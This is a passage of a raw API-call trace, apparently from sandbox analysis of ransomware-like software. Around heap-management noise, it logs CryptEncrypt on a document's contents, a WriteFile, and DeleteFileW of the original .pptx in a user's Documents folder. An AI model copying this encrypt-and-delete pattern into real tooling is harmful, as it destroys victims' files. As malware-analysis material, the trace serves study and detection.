[0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.523] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.524] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.524] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0078.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0078.524] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.526] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xf755, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xf760) returned 1 [0078.526] CharLowerBuffW (in: lpsz="byte[63329]", cchLength=0xb | out: lpsz="byte[63329]") returned 0xb [0078.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.528] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x491e668*, pdwDataLen=0x144e790*=0xf755, dwBufLen=0xf760 | out: pbData=0x491e668*, pdwDataLen=0x144e790*=0xf760) returned 1 [0078.529] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.529] WriteFile (in: hFile=0x298, lpBuffer=0x49a9770*, nNumberOfBytesToWrite=0xf760, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49a9770*, lpNumberOfBytesWritten=0x144f194*=0xf760, lpOverlapped=0x0) returned 1 [0078.536] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.536] CryptDestroyKey (hKey=0x41ac180) returned 1 [0078.536] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.536] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.536] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0078.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.537] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.537] CloseHandle (hObject=0x258) returned 1 [0078.538] CloseHandle (hObject=0x298) returned 1 [0078.554] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx", lpFilePart=0x0) returned 0x28 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0078.554] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z_hkc3lg6.pptx")) returned 0x20 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0078.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa95ebd80, ftCreationTime.dwHighDateTime=0x1d59c9b, ftLastAccessTime.dwLowDateTime=0x5bc02500, ftLastAccessTime.dwHighDateTime=0x1d5bb04, ftLastWriteTime.dwLowDateTime=0x5bc02500, ftLastWriteTime.dwHighDateTime=0x1d5bb04, nFileSizeHigh=0x0, nFileSizeLow=0xf755, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z_HKc3lg6.pptx", cAlternateFileName="Z_HKC3~1.PPT")) returned 0x41ac2c0 [0078.555] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\z_HKc3lg6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z_hkc3lg6.pptx")) returned 1 [0078.559] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa95ebd80, ftCreationTime.dwHighDateTime=0x1d59c9b, ftLastAccessTime.dwLowDateTime=0x5bc02500, ftLastAccessTime.dwHighDateTime=0x1d5bb04, ftLastWriteTime.dwLowDateTime=0x5bc02500, ftLastWriteTime.dwHighDateTime=0x1d5bb04, nFileSizeHigh=0x0, nFileSizeLow=0xf755, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="z_HKc3lg6.pptx", cAlternateFileName="Z_HKC3~1.PPT")) returned 0 [0078.559] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0078.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0078.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9e48 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0078.560] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0078.560] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0078.560] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0078.561] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0078.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0078.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0078.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0078.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cb0 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0078.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0078.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.563] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0078.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 